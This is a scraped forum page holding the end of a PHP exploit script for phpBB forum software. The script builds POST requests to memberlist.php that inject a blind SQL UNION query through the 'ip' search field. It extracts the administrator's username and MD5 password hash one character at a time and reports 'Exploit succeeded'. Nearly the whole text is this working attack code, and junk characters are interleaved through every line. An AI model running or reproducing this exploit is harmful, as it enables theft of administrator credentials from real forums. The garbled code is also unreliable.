    : u. y8 U! e5 ^5 U$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id ,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
    1 v8 J# u0 G3 a& u+ |echo "sql -> ".$sql."  t" F1 u5 O; B- U% V7 t
    ";
    6 P3 w( E/ x8 ~& b" D5 @( C& x$sql=urlencode(strtoupper($sql)); 7 L/ D+ @+ K8 m
    $data="username=";
    % W- `5 m. C$ K  v$ U$data.="&amp;icq=";
    2 T4 E: Z. N/ R3 B, w4 `$data.="&amp;email=";
    9 D/ i) O6 f6 V0 M& d$data.="&amp;aim="; 1 ~3 }/ f0 \+ q0 S5 ~
    $data.="&amp;joined_select=lt"; - N4 i, o5 n, m% s4 H% H4 {6 _% |, P
    $data.="&amp;joined="; 2 V% R% q# \  O
    $data.="&amp;yahoo="; 8 Z7 d" E7 Z! @; k, `. m
    $data.="&amp;active_select=lt"; 5 w4 ]/ |. M* f( H& `+ j
    $data.="&amp;active=";
    & E2 X( s3 f8 w7 }8 X6 t$data.="&amp;msn=";
    , H; y$ _6 D# s; I$data.="&amp;count_select=eq";
    + c3 ^% X" m2 s9 _3 W4 P7 Y$data.="&amp;count="; 7 [% m; R6 z4 N, s
    $data.="&amp;jabber=";
    6 L* h# w3 I' G. H3 \* z$data.="&amp;sk=c";
    ; B. }2 H% c! y4 }) c1 m" m$data.="&amp;sd=a"; ' c4 O& ~* K+ `; M: O2 t( P9 @
    $data.="&amp;ip=".$sql;
    : F( H5 v% S+ \% v5 {7 a$data.="&amp;search_group_id=0";
    / K0 i! _1 L  l+ \2 K$data.="&amp;submit=Search"; 2 g. B8 L- Y1 m' ?5 A
    $packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0
    ( x, p- z1 s( G. ~5 b% V  o8 R' Z";
    9 q4 Y1 ^. E+ x3 b$packet.="Content-Type: application/x-www-form-urlencoded8 z4 z/ }5 i0 a- z2 ^  z. O( c4 f
    ";
    6 B. Q& p: p  ~) U$ B+ u: N7 e/ e$packet.="Host: ".$host."
    & z& N0 ~1 U2 t% B1 v"; ! ?1 G" k6 u) o$ B3 ^( u1 @
    $packet.="Content-Length: ".strlen($data)."& ]) k9 f4 j3 ?% A+ p! K
    ";
    2 V; F( l0 ]! E+ C$packet.="Connection: Close$ Q4 j" {' Y" M6 z5 K' C
    "; % X6 U8 c% d) u( R1 U
    $packet.="Cookie: ".$cookie."
    6 {1 l# r' L$ X! y6 n; B$ \
    # x0 R* v# O/ J  O"; $ p+ \) {. w4 L1 |# O
    $packet.=$data; % }/ i% r9 y  J% c. U2 w
    sendpacketii($packet);
    ( D& a2 ?1 V5 I8 c+ Cif (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]
    5 c$ {' S$ y5 K";sleep(2);break;}
    % c; ^" w% n. q. T6 M4 I}
    ; L) p/ j5 A) P; O) Qif ($i==255) {die("Exploit failed...");}
    / ?( P3 |$ K( `$j++; 7 G8 J& S, s3 k# R. U! ~3 `9 ]( e, x
    }
    ! u6 u. c0 U+ `6 @+ ^echo "--------------------------------------------------------------------
    $ I2 S9 X% H6 `";
    2 z, A9 i) M3 R" Hecho "admin -> ".$admin."7 `2 e; c- N3 h' ^+ i  @' M
    ";
    9 W' M( H0 Y: Q4 B! k4 M$ z$ Z" i) {echo "password (md5) -> ".$password."" a: p6 {! b5 @
    "; . E* F* }: u3 l6 V0 k& S, n: q( w0 F
    echo "--------------------------------------------------------------------, y5 k4 _" {9 W% K
    ";
    ( P7 ^8 D' B2 u5 m0 b6 rfunction is_hash($hash) % f/ V& w: G( u- z" _, y8 a/ I' L
    {
    1 b7 D, W6 ?3 iif (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} 1 N/ A- ^# r* d0 P0 c) t" y9 {6 y* U
    else {return false;} 4 r# X; |) ~% p7 k) q( q
    }
    & V7 w; |7 r- I! Sif (is_hash($password)) {echo "Exploit succeeded...";}
    0 s( @/ L$ j# h( k5 @else {echo "Exploit failed...";}
      Q9 D$ i' d* ^3 M! \8 j; C. C?>
    ; k9 F6 ?! c. a* h6 J
    " {3 b- V; ^( b, Z* L: e6 g2 q
    # u! n+ q/ Q9 f5 D2 h. u4 F6 g0 x: h( ^* y- a! j" p5 F# V

    / |, j) v5 R  s$ \8 z) S3 x  p" g* H" o: k" R4 w2 Z

      a/ V4 ?( X. \* r7 E1 r1 _! ~
      B9 G/ b7 E; F$ T# C6 l3 Q3 p. O
    $ B/ r2 m8 M) ~+ a5 C9 y9 \9 t- _
    6 d9 g4 r4 v5 L( C( X

    ; y% N( [7 s+ S: S3 v
    6 I5 m2 G+ Z$ V
    8 T; A6 s) z! T1 x) m6 R
    6 E- A' |7 J* l) }9 @
    ) ^; ~! _3 e1 B$ ], c" f
    & A( _! I3 c' r% v0 A; b  W- ]4 n2 [( \4 q) c

    . s, d: F, p3 y6 f" C9 I公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表